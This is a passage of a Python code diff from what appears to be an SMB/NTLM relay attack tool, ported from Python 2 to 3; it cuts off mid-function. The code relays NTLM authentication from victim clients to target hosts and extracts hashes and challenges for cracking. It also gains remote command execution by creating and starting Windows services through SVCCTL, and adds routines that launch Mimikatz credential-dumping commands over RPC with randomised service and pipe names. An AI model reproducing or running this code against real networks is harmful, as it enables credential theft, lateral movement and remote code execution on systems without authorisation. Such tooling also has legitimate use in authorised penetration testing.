attempt returned logon_failure. Not forwarding anymore to prevent account lockout\n"%(Domain,User) + with open(Logs_Path+"logs/"+Outfile,"rb") as filestr: + Login = Client+':'+User+':'+Domain+':'+Target+':Logon Failure' + if re.search(codecs.encode(NetworkSendBufferPython2or3(Login),'hex'), codecs.encode(filestr.read(),'hex')): + print("[+] User %s\\%s previous login attempt returned logon_failure. Not forwarding anymore to prevent account lockout\n"%(Domain,User)) return True else: @@ -82,129 +113,178 @@ def ReadData(Outfile, Client, User, Domain, Target, cmd): raise def ServeOPTIONS(data): - WebDav= re.search('OPTIONS', data) - if WebDav: - Buffer = WEBDAV_Options_Answer() - return str(Buffer) + WebDav= re.search(b'OPTIONS', data) + if WebDav: + Buffer = WEBDAV_Options_Answer() + return str(Buffer) - return False + return False def IsSMBAnonymous(data): - SSPIStart = data.find('NTLMSSP') + SSPIStart = data.find(b'NTLMSSP') SSPIString = data[SSPIStart:] Username = struct.unpack(' 24: - NthashLen = 64 - DomainLen = struct.unpack(' 24: + DomainLen = struct.unpack(' 60: - SMBHash = SSPIString[NthashOffset:NthashOffset+NthashLen].encode("hex").upper() - DomainLen = struct.unpack(' 60: + SMBHash = codecs.encode(SSPIString[NthashOffset:NthashOffset+NthashLen],'hex').decode('latin-1').upper() + DomainLen = struct.unpack('= 258: - Challenge = data[106:114] - print "[+] Setting up HTTP relay with SMB challenge:", Challenge.encode("hex") - return Challenge + Challenge = data[106:114] + if Pivoting[0] == "1": + return Challenge + else: + print("[+] Setting up HTTP relay with SMB challenge:", codecs.encode(Challenge,'hex').decode('latin-1')) + return Challenge #Here we extract the complete NTLM message from an HTTP request and we will later feed it to our SMB target. def ExtractRawNTLMPacket(data): SecBlobLen = struct.unpack("i", len(''.join(payload))) + return length + +def ConvertToClassC(Host, Class): + Class = Class.strip() + Ip = re.split(r'(\.|/)', Host) + if Class == "/24": + Ip[6:7] = ["0"] + return ''.join(Ip)+Class + if Class == "/16": + Ip[4:5] = ["0"] + Ip[6:7] = ["0"] + return ''.join(Ip)+Class + else: + print("Illegal class, please use: /24 or /16") + return None + +def GenerateRandomFileName(): + return ''.join([random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ') for i in range(random.randint(5, 15))]) + +def GenerateServiceName(): + return ''.join([random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ') for i in range(11)]) + +def GenerateServiceID(): + return''.join([random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ') for i in range(16)]) + +def GenerateNamedPipeName(): + return''.join([random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789') for i in range(random.randint(3, 30))]) + +def Generateuuid(): + RandomStr = binascii.b2a_hex(os.urandom(16)) + x = uuid.UUID(bytes_le=codecs.decode(RandomStr,'hex')) + DisplayGUID = uuid.UUID(RandomStr.decode('latin-1')) + DisplayGUIDle = x.bytes + return str(DisplayGUID), str(DisplayGUIDle.decode('latin-1')) + +### +#SMBRelay grab +### + +def GrabNegotiateFromTarget(data, s, Pivoting): + ## Start with nego protocol + session setup negotiate to our target. + h = SMBHeader(cmd="\x72",flag1="\x18", flag2="\x07\xc8") + n = SMBNegoCairo(Data = SMBNegoCairoData()) + n.calculate() + packet0 = str(h)+str(n) + buffer0 = longueur(packet0)+packet0 + s.send(NetworkSendBufferPython2or3(buffer0)) + smbdata = s.recv(4096) + ##Session Setup AndX Request, NTLMSSP_NEGOTIATE to our target. + if smbdata[8:10] == b'\x72\x00': + head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x07\xc8",mid="\x02\x00") + t = data[36:].decode('latin-1') #simply grab the whole packet except the smb header from the client. + packet1 = str(head)+str(t) + buffer1 = longueur(packet1)+packet1 + s.send(NetworkSendBufferPython2or3(buffer1)) + smbdata = s.recv(4096) + challenge = ExtractSMBChallenge(smbdata, Pivoting)#Grab the challenge, in case we want to crack the hash later. + return data, smbdata, s, challenge + +def SendChallengeToClient(data, smbdata, conn): + ##Relay all that to our client. + if data[8:10] == b'\x73\x00': + head = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x53\xc8", errorcode="\x16\x00\x00\xc0", pid=pidcalc(data),mid=midcalc(data)) + t = smbdata[36:]#simply grab the whole packet except the smb header from the client. + packet0 = str(head)+str(t) + buffer0 = longueur(packet0)+packet0 + conn.send(NetworkSendBufferPython2or3(buffer0)) + data = conn.recv(4096) + return data, conn + +##This function is one of the main SMB read function. We request all the time 65520 bytes to the server. #Add (+32 (SMBHeader) +4 Netbios Session Header + 27 for the ReadAndx structure) +63 and you end up with 65583. #set the socket to non-blocking then grab all data, if our target has less than 65520 (last packet) grab the incoming #data until we reach our custom timeout. Set back the socket to blocking and return the data. @@ -287,7 +468,7 @@ def SMBReadRecv(s): try: data = s.recv(65583) if data: - Completedata.append(data) + Completedata.append(data.decode('latin-1')) Start=time.time() else: break @@ -297,240 +478,536 @@ def SMBReadRecv(s): s.setblocking(1) return s, ''.join(Completedata) -##We send our ReadAndX request with our offset and call SMBReadRecv +##We send our ReadAndX request with our offset and call SMBReadRecv def ReadOutput(DataOffset, f, data, s): - head = SMBHeader(cmd="\x2e",uid=data[32:34],tid=data[28:30],pid=data[30:32],mid="\x12\x00") - t = ReadRequestAndX(FID=f, Offset = DataOffset) - packet1 = str(head)+str(t) - buffer1 = longueur(packet1)+packet1 - s.send(buffer1) - s, data = SMBReadRecv(s) - return data, s, ExtractCommandOutput(data) + if isinstance(data, str): + data = data.encode('latin-1') + head = SMBHeader(cmd="\x2e",uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'),pid=data[30:32].decode('latin-1'),mid="\x12\x00") + t = ReadRequestAndX(FID=f.decode('latin-1'), Offset = DataOffset) + packet1 = str(head)+str(t) + buffer1 = longueur(packet1)+packet1 + s.send(NetworkSendBufferPython2or3(buffer1)) + s, data = SMBReadRecv(s) + return data, s, ExtractCommandOutput(data) -##When used this function will inject an OpenAndX file not found SMB Header into an incoming packet. -##This is usefull for us when an operation fail. We land back to our shell and send directly a -##Tree Connect IPC$ so we don't loose this precious connection. +##We send our WriteAndX request with our offset. +def WriteOutput(DataOffset, Chunk, data, f, s): + head = SMBHeader(cmd="\x2f", flag1="\x18", flag2="\x07\xc8", uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'),pid=data[30:32].decode('latin-1'),mid="\x12\x00") + t = SMBWriteData(FID=f.decode('latin-1'), Offset = DataOffset, Data= Chunk) + t.calculate() + packet1 = str(head)+str(t) + buffer1 = longueur(packet1)+packet1 + s.send(NetworkSendBufferPython2or3(buffer1)) + data = s.recv(2048) + ##LockingAndX //should not happens since we didn't request an oplock, but just in case.. + if data[8:10] == b"\x24\x00": + head = SMBHeader(cmd="\x24", flag1="\x88", flag2="\x07\xc8", uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'),pid=data[30:32].decode('latin-1'),mid="\x12\x00") + t = SMBLockingAndXResponse() + packet1 = str(head)+str(t) + buffer1 = longueur(packet1)+packet1 + s.send(NetworkSendBufferPython2or3(buffer1)) + return data, s + +##When used this function will inject an OpenAndX file not found SMB Header into an incoming packet. +##This is usefull for us when an operation fail. We land back to our shell send right away a +##Tree Connect IPC$ and start to send SMB echos so we don't loose this precious connection. def ModifySMBRetCode(data): - modified = list(data) - modified[8:10] = "\x2d\x34" - return ''.join(modified) + if isinstance(data, str): + modified = list(data) + modified[8:10] = str("\x2d\x34") + return ''.join(modified) + else: + data = data.decode('latin-1') + modified = list(data) + modified[8:10] = str("\x2d\x34") + return ''.join(modified) +##We send our ReadAndX request with our offset and call recv() +def SMBDCERPCReadOutput(DataOffset, length,f, data, s): + head = SMBHeader(cmd="\x2e",uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'),pid=data[30:32].decode('latin-1'),mid="\x12\x00") + t = SMBDCERPCReadRequestAndX(FID=f.decode('latin-1'), MaxCountLow=length, MinCount=length,Offset = DataOffset) + packet1 = str(head)+str(t) + buffer1 = longueur(packet1)+packet1 + s.send(NetworkSendBufferPython2or3(buffer1)) + data = s.recv(8092) + return data, s, ExtractRPCCommandOutput(data) -### -#SMBRelay grab -### - -def GrabNegotiateFromTarget(data, s): - ## Start with nego protocol + session setup negotiate to our target. - h = SMBHeader(cmd="\x72",flag1="\x18", flag2="\x07\xc8") - n = SMBNegoCairo(Data = SMBNegoCairoData()) - n.calculate() - packet0 = str(h)+str(n) - buffer0 = longueur(packet0)+packet0 - s.send(buffer0) - smbdata = s.recv(4096) - ##Session Setup AndX Request, NTLMSSP_NEGOTIATE to our target. - if smbdata[8:10] == "\x72\x00": - head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x07\xc8",mid="\x02\x00") - t = data[36:] #simply grab the whole packet except the smb header from the client. - packet1 = str(head)+str(t) - buffer1 = longueur(packet1)+packet1 - s.send(buffer1) - smbdata = s.recv(4096) - challenge = ExtractSMBChallenge(smbdata)#Grab the challenge, in case we want to crack the hash later. - return data, smbdata, s, challenge - -def SendChallengeToClient(data, smbdata, conn): - ##Relay all that to our client. - if data[8:10] == "\x73\x00": - head = SMBHeader(cmd="\x73",flag1="\x98", flag2="\x53\xc8", errorcode="\x16\x00\x00\xc0", pid=pidcalc(data),mid=midcalc(data)) - t = smbdata[36:]#simply grab the whole packet except the smb header from the client. - packet0 = str(head)+str(t) - buffer0 = longueur(packet0)+packet0 - conn.send(buffer0) - data = conn.recv(4096) - return data, conn ### #BindCall ### def BindCall(UID, Version, File, data, s): Data = data - head = SMBHeader(cmd="\xa2",flag1="\x18", flag2="\x02\x28",mid="\x05\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) - t = SMBNTCreateData(FileName=File) + head = SMBHeader(cmd="\xa2",flag1="\x18", flag2="\x02\x28",mid="\x05\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1')) + t = SMBNTCreateDataSVCCTL(FileName=File) t.calculate() packet0 = str(head)+str(t) buffer1 = longueur(packet0)+packet0 - s.send(buffer1) + s.send(NetworkSendBufferPython2or3(buffer1)) data = s.recv(2048) + if isinstance(data, str): + data.encode('latin-1') ## Fail Handling. - if data[8:10] == "\xa2\x22": - print "[+] NT_CREATE denied. SMB Signing mandatory or this user has no privileges on this workstation.\n" + if data[8:10] == b"\xa2\x22": + print("[+] NT_CREATE denied. SMB Signing mandatory or this user has no privileges on this workstation.\n") return ModifySMBRetCode(data) ## Fail Handling. - if data[8:10]== "\xa2\xac":##Pipe is sleeping. + if data[8:10]== b"\xa2\xac":##Pipe is sleeping. f = "PipeNotAvailable" return Data, s, f ## Fail Handling. - if data[8:10]== "\xa2\x34":##Pipe is not enabled. + if data[8:10]== b"\xa2\x34":##Pipe is not enabled. f = "ServiceNotFound" return Data, s, f ## DCE/RPC Write. - if data[8:10] == "\xa2\x00": - head = SMBHeader(cmd="\x2f",flag1="\x18", flag2="\x05\x28",mid="\x06\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) + if data[8:10] == b"\xa2\x00": + head = SMBHeader(cmd="\x2f",flag1="\x18", flag2="\x05\x28",mid="\x06\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1')) x = SMBDCEData(CTX0UID=UID, CTX0UIDVersion=Version) x.calculate() f = data[42:44] - t = SMBWriteData(FID=f,Data=x) + t = SMBDCERPCWriteData(FID=f.decode('latin-1'),Data=x) t.calculate() packet0 = str(head)+str(t) buffer1 = longueur(packet0)+packet0 - s.send(buffer1) + s.send(NetworkSendBufferPython2or3(buffer1)) data = s.recv(2048) + ## DCE/RPC Read. - if data[8:10] == "\x2f\x00": - head = SMBHeader(cmd="\x2e",flag1="\x18", flag2="\x05\x28",mid="\x07\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) - t = SMBReadData(FID=f,MaxCountLow="\x00\x04", MinCount="\x00\x04",Offset="\x00\x00\x00\x00") - t.calculate() - packet0 = str(head)+str(t) - buffer1 = longueur(packet0)+packet0 - s.send(buffer1) - data = s.recv(2048) - return data, s, f + if data[8:10] == b"\x2f\x00": + head = SMBHeader(cmd="\x2e",flag1="\x18", flag2="\x05\x28",mid="\x07\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1')) + t = SMBReadData(FID=f.decode('latin-1'),MaxCountLow="\x00\x04", MinCount="\x00\x04",Offset="\x00\x00\x00\x00") + t.calculate() + packet0 = str(head)+str(t) + buffer1 = longueur(packet0)+packet0 + s.send(NetworkSendBufferPython2or3(buffer1)) + data = s.recv(2048) + return data, s, f ########################### -#Launch And Create Service +#Launch A Mimikatz CMD ########################### -def CreateService(Command, f, host, data, s): +def MimiKatzRPC(Command, f, host, data, s): + ## DCE/RPC MimiKatzRPC. + ## DCE/RPC Write. + if data[8:10] == b"\x2e\x00": + head = SMBHeader(cmd="\x2f",flag1="\x18", flag2="\x05\x28",mid="\x06\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1')) + w = SMBDCEMimiKatzRPCCommand(CMD=Command) + w.calculate() + x = SMBDCEPacketData(Data=w, Opnum="\x03\x00") + x.calculate() + t = SMBDCERPCWriteData(FID=f.decode('latin-1'),Data=x) + t.calculate() + packet0 = str(head)+str(t) + buffer1 = longueur(packet0)+packet0 + s.send(NetworkSendBufferPython2or3(buffer1)) + data = s.recv(2048) + + ## DCE/RPC Read. + if data[8:10] == b"\x2f\x00": + head = SMBHeader(cmd="\x2e",flag1="\x18", flag2="\x05\x28",mid="\x07\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1')) + t = SMBReadData(FID=f.decode('latin-1'),MaxCountLow=StructWithLenPython2or3('60: + minutes = Seconds/60 + print('Fetched in: %.3g minutes.'%(minutes)) + if Seconds<60: + print('Fetched in: %.3g seconds'%(Seconds)) + print("Output:\n", Output) + return data,s,f + +###################################### +#Launch And Create a MimiKatz Service +###################################### +def CreateMimikatzService(Command, ServiceNameChars, ServiceIDChars, f, host, data, s): ## DCE/RPC SVCCTLOpenManagerW. - if data[8:10] == "\x2e\x00": - head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x08\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) + if data[8:10] == b"\x2e\x00": + head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x08\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1')) w = SMBDCESVCCTLOpenManagerW(MachineNameRefID="\x00\x00\x02\x00", MachineName=host) w.calculate() x = SMBDCEPacketData(Data=w) x.calculate() - t = SMBTransDCERPC(FID=f,Data=x) + t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x) t.calculate() packet0 = str(head)+str(t) buffer1 = longueur(packet0)+packet0 - s.send(buffer1) + s.send(NetworkSendBufferPython2or3(buffer1)) data = s.recv(2048) ##Error handling. - if data[8:10] == "\x2e\x00": - if data[len(data)-4:] == "\x05\x00\x00\x00": - print "[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?\n" + if data[8:10] == b"\x2e\x00": + if data[len(data)-4:] == b"\x05\x00\x00\x00": + print("[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?\n") return ModifySMBRetCode(data) ## DCE/RPC Create Service. - if data[8:10] == "\x25\x00": - ContextHandler = data[84:104] - ServiceNameChars = ''.join([random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ') for i in range(11)]) - ServiceIDChars = ''.join([random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ') for i in range(16)]) - head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x09\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) - w = SMBDCESVCCTLCreateService(ContextHandle=ContextHandler, ServiceName=ServiceNameChars,DisplayNameID=ServiceIDChars,BinCMD=Command) + if data[8:10] == b"\x25\x00": + ContextHandler = data[84:104].decode('latin-1') + head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x09\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1')) + w = SMBDCESVCCTLCreateService(ContextHandle=ContextHandler,ServiceName=ServiceNameChars,DisplayNameID=ServiceIDChars,BinCMD=Command) w.calculate() x = SMBDCEPacketData(Opnum="\x0c\x00",Data=w) x.calculate() - t = SMBTransDCERPC(FID=f,Data=x) + t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x) t.calculate() packet0 = str(head)+str(t) buffer1 = longueur(packet0)+packet0 - s.send(buffer1) + s.send(NetworkSendBufferPython2or3(buffer1)) data = s.recv(2048) #print "[+] Creating service" ## DCE/RPC SVCCTLOpenService. - if data[8:10] == "\x25\x00": - if data[len(data)-4:] == "\x05\x00\x00\x00": - print "[+] Failed to create the service\n" + if data[8:10] == b"\x25\x00": + if data[len(data)-4:] == b"\x05\x00\x00\x00": + print("[+] Failed to create the service\n") return ModifySMBRetCode(data) - #print "[+] Service name: %s with display name: %s successfully created"%(ServiceNameChars, ServiceIDChars) - ContextHandlerService = data[88:108] - head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0a\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) + ContextHandlerService = data[88:108].decode('latin-1') + head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0a\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1')) w = SMBDCESVCCTLOpenService(ContextHandle=ContextHandler,ServiceName=ServiceNameChars) w.calculate() x = SMBDCEPacketData(Opnum="\x10\x00",Data=w) x.calculate() - t = SMBTransDCERPC(FID=f,Data=x) + t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x) t.calculate() packet0 = str(head)+str(t) buffer1 = longueur(packet0)+packet0 - s.send(buffer1) + s.send(NetworkSendBufferPython2or3(buffer1)) data = s.recv(2048) ## DCE/RPC SVCCTLStartService. - if data[8:10] == "\x25\x00": - if data[len(data)-4:] == "\x05\x00\x00\x00": - print "[+] Failed to open the service.\n" + if data[8:10] == b"\x25\x00": + if data[len(data)-4:] == b"\x05\x00\x00\x00": + print("[+] Failed to open the service.\n") return ModifySMBRetCode(data) - ContextHandler = data[84:104] - head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) + ContextHandler = data[84:104].decode('latin-1') + head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1')) w = SMBDCESVCCTLStartService(ContextHandle=ContextHandler) x = SMBDCEPacketData(Opnum="\x13\x00",Data=w) x.calculate() - t = SMBTransDCERPC(FID=f,Data=x) + t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x) t.calculate() packet0 = str(head)+str(t) buffer1 = longueur(packet0)+packet0 - s.send(buffer1) + s.send(NetworkSendBufferPython2or3(buffer1)) data = s.recv(2048) ## DCE/RPC SVCCTLQueryService. - if data[8:10] == "\x25\x00": - if data[len(data)-4:] == "\x05\x00\x00\x00": - print "[+] Failed to start the service.\n" + if data[8:10] == b"\x25\x00": + if data[len(data)-4:] == b"\x05\x00\x00\x00": + print("[+] Failed to start the service.\n") return ModifySMBRetCode(data) - head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) + head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1')) w = SMBDCESVCCTLQueryService(ContextHandle=ContextHandlerService) x = SMBDCEPacketData(Opnum="\x06\x00",Data=w) x.calculate() - t = SMBTransDCERPC(FID=f,Data=x) + t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x) t.calculate() packet0 = str(head)+str(t) buffer1 = longueur(packet0)+packet0 - s.send(buffer1) + s.send(NetworkSendBufferPython2or3(buffer1)) data = s.recv(2048) - s.send(buffer1) + s.send(NetworkSendBufferPython2or3(buffer1)) data = s.recv(2048) - s.send(buffer1) - data = s.recv(2048) - - ## DCE/RPC SVCCTLDeleteService. - if data[8:10] == "\x25\x00": - if data[len(data)-4:] == "\x05\x00\x00\x00": - print "[+] Failed to start the service.\n" - return ModifySMBRetCode(data) - head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) - w = SMBDCESVCCTLDeleteService(ContextHandle=ContextHandlerService) - x = SMBDCEPacketData(Opnum="\x02\x00",Data=w) - x.calculate() - t = SMBTransDCERPC(FID=f,Data=x) - t.calculate() - packet0 = str(head)+str(t) - buffer1 = longueur(packet0)+packet0 - s.send(buffer1) + s.send(NetworkSendBufferPython2or3(buffer1)) data = s.recv(2048) ## DCE/RPC SVCCTLCloseService - if data[8:10] == "\x25\x00": - if data[len(data)-4:] == "\x05\x00\x00\x00": - print "[+] Failed to delete the service.\n" + if data[8:10] == b"\x25\x00": + if data[len(data)-4:] == b"\x05\x00\x00\x00": + print("[+] Failed to query the service.\n") return ModifySMBRetCode(data) - head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) + head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1')) w = SMBDCESVCCTLCloseService(ContextHandle=ContextHandlerService) x = SMBDCEPacketData(Opnum="\x00\x00",Data=w) x.calculate() - t = SMBTransDCERPC(FID=f,Data=x) + t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x) t.calculate() packet0 = str(head)+str(t) buffer1 = longueur(packet0)+packet0 - s.send(buffer1) + s.send(NetworkSendBufferPython2or3(buffer1)) data = s.recv(2048) - return data, s, f + return data, s, f + +########################### +#Stop And Delete A Service +########################### +def StopAndDeleteService(Command, ServiceNameChars, ServiceIDChars, f, host, data, s): + ## DCE/RPC SVCCTLOpenManagerW. + if data[8:10] == b"\x2e\x00": + head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x08\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1')) + w = SMBDCESVCCTLOpenManagerW(MachineNameRefID="\x00\x00\x02\x00", MachineName=host) + w.calculate() + x = SMBDCEPacketData(Data=w) + x.calculate() + t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x) + t.calculate() + packet0 = str(head)+str(t) + buffer1 = longueur(packet0)+packet0 + s.send(NetworkSendBufferPython2or3(buffer1)) + data = s.recv(2048) + ##Error handling. + if data[8:10] == b"\x2e\x00": + if data[len(data)-4:] == b"\x05\x00\x00\x00": + print("[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?\n") + return ModifySMBRetCode(data) + + ## DCE/RPC SVCCTLOpenService. + if data[8:10] == b"\x25\x00": + if data[len(data)-4:] == b"\x05\x00\x00\x00": + print("[+] Failed to create the service\n") + return ModifySMBRetCode(data) + ContextHandlerService = data[84:104].decode('latin-1') + head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0a\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1')) + w = SMBDCESVCCTLOpenService(ContextHandle=ContextHandlerService,ServiceName=ServiceNameChars) + w.calculate() + x = SMBDCEPacketData(Opnum="\x10\x00",Data=w) + x.calculate() + t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x) + t.calculate() + packet0 = str(head)+str(t) + buffer1 = longueur(packet0)+packet0 + s.send(NetworkSendBufferPython2or3(buffer1)) + data = s.recv(2048) + + ## DCE/RPC SVCCTLControlService, stop operation. + if data[8:10] == b"\x25\x00": + if data[len(data)-4:] == b"\x05\x00\x00\x00": + print("[+] Failed to open the service.\n") + return ModifySMBRetCode(data) + ContextHandlerService = data[84:104].decode('latin-1') + head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1')) + w = SMBDCESVCCTLControlService(ContextHandle=ContextHandlerService, ControlOperation="\x01\x00\x00\x00") + x = SMBDCEPacketData(Opnum="\x01\x00",Data=w) + x.calculate() + t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x) + t.calculate() + packet0 = str(head)+str(t) + buffer1 = longueur(packet0)+packet0 + s.send(NetworkSendBufferPython2or3(buffer1)) + data = s.recv(2048) + + ## DCE/RPC SVCCTLDeleteService. + if data[8:10] == b"\x25\x00": + if data[len(data)-4:] == b"\x05\x00\x00\x00": + print("[+] Failed to stop the service.\n") + return ModifySMBRetCode(data) + head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1')) + w = SMBDCESVCCTLDeleteService(ContextHandle=ContextHandlerService) + x = SMBDCEPacketData(Opnum="\x02\x00",Data=w) + x.calculate() + t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x) + t.calculate() + packet0 = str(head)+str(t) + buffer1 = longueur(packet0)+packet0 + s.send(NetworkSendBufferPython2or3(buffer1)) + data = s.recv(2048) + + ## DCE/RPC SVCCTLCloseService + if data[8:10] == b"\x25\x00": + if data[len(data)-4:] == b"\x05\x00\x00\x00": + print("[+] Failed to delete the service.\n") + return ModifySMBRetCode(data) + head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0b\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1')) + w = SMBDCESVCCTLCloseService(ContextHandle=ContextHandlerService) + x = SMBDCEPacketData(Opnum="\x00\x00",Data=w) + x.calculate() + t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x) + t.calculate() + packet0 = str(head)+str(t) + buffer1 = longueur(packet0)+packet0 + s.send(NetworkSendBufferPython2or3(buffer1)) + data = s.recv(2048) + return data, s, f + + +########################### +#Launch And Create Service +########################### +def CreateService(Command, ServiceNameChars, ServiceIDChars, f, host, data, s): + ## DCE/RPC SVCCTLOpenManagerW. + if data[8:10] == b"\x2e\x00": + head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x08\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1')) + w = SMBDCESVCCTLOpenManagerW(MachineNameRefID="\x00\x00\x02\x00", MachineName=host) + w.calculate() + x = SMBDCEPacketData(Data=w) + x.calculate() + t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x) + t.calculate() + packet0 = str(head)+str(t) + buffer1 = longueur(packet0)+packet0 + s.send(NetworkSendBufferPython2or3(buffer1)) + data = s.recv(2048) + ##Error handling. + if data[8:10] == b"\x2e\x00": + if data[len(data)-4:] == b"\x05\x00\x00\x00": + print("[+] Failed to open SVCCTL Service Manager, is that user a local admin on this host?\n") + return ModifySMBRetCode(data) + + ## DCE/RPC Create Service. + if data[8:10] == b"\x25\x00": + ContextHandler = data[84:104].decode('latin-1') + head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x09\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1')) + w = SMBDCESVCCTLCreateService(ContextHandle=ContextHandler,ServiceName=ServiceNameChars,DisplayNameID=ServiceIDChars,BinCMD=Command) + w.calculate() + x = SMBDCEPacketData(Opnum="\x0c\x00",Data=w) + x.calculate() + t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x) + t.calculate() + packet0 = str(head)+str(t) + buffer1 = longueur(packet0)+packet0 + s.send(NetworkSendBufferPython2or3(buffer1)) + data = s.recv(2048) + #print "[+] Creating service" + + ## DCE/RPC SVCCTLOpenService. + if data[8:10] == b"\x25\x00": + if data[len(data)-4:] == b"\x05\x00\x00\x00": + print("[+] Failed to create the service\n") + return ModifySMBRetCode(data) + ContextHandlerService = data[88:108].decode('latin-1') + head = SMBHeader(cmd="\x25",flag1="\x18", flag2="\x07\xc8",mid="\x0a\x00",pid=data[30:32].decode('latin-1'),uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1')) + w = SMBDCESVCCTLOpenService(ContextHandle=ContextHandler,ServiceName=ServiceNameChars) + w.calculate() + x = SMBDCEPacketData(Opnum="\x10\x00",Data=w) + x.calculate() + t = SMBTransDCERPC(FID=f.decode('latin-1'),Data=x) + t.calculate() + packet0 = str(head)+str(t) + buffer1 = longueur(packet0)+packet0 + s.send(NetworkSendBufferPython2or3(buffer1)) + data = s.recv(2048) + + ## DCE/RPC SVCCTLStartService. + if data[8:10] == b"\x25\x00": + if data[len(data)-4:] == b"\x05\x00\x00\x00": + print("[+] Failed to open the service.\n") + return ModifySMBRetCode(data) + ContextHandler = data[84:104].decode('latin-1') + head = 